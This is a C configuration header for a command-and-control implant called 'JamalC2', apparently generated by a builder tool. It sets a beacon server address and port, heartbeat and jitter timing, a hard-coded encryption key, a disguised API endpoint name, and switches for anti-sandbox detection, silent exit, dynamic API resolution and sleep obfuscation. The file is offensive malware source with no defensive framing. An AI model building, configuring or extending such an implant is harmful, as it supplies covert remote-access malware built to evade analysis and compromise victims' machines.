/*
 * JamalC2 Implant - Configuration Header
 * This file is auto-generated by the Builder
 */

#ifndef CONFIG_H
#define CONFIG_H

// Server Configuration
#define SERVER_HOST "192.168.70.128"
#define SERVER_PORT 4444
#define USE_TLS 0

// Client Configuration
#define TAG "default"
#define VERSION "1.0.0"

// Beacon Configuration
#define HEARTBEAT_INTERVAL 30 // seconds
#define RECONNECT_DELAY 5     // seconds
#define JITTER_PERCENT 20     // 0-100%

// Encryption Key (64 hex chars = 32 bytes)
#define ENCRYPTION_KEY                                                         \
  "e780b53c1f8f50e8c8a9f188f93f6707f820f5fe39062ce0dc4f6fb6303e2adf"

// Run Key (for execution validation)
#define RUN_KEY "321"
#define SKIP_KEY_CHECK 1

// API Paths (all requests go to same endpoint, type is in encrypted payload)
#define API_CHECKIN "/api/CpHDCPSvc"
#define API_RESULT "/api/CpHDCPSvc"

// === Evasion Settings ===
#define ENABLE_EVASION 0      // 启用反沙箱检测 (1=启用, 0=禁用)
#define EVASION_EXIT_SILENT 1 // 检测到沙箱时静默退出 (1=退出, 0=继续运行)
#define ENABLE_DYNAPI 1       // 启用动态 API 解析 (1=启用, 0=禁用)
#define ENABLE_SLEEP_OBF 0    // 启用睡眠混淆 (1=启用, 0=禁用)

// Debug mode (set to 0 to disable all console output)
#define DEBUG_MODE 1

// Debug print macro
#if DEBUG_MODE
#define DEBUG_PRINT(...) printf(__VA_ARGS__)
#else
#define DEBUG_PRINT(...) ((void)0)
#endif

#endif // CONFIG_H
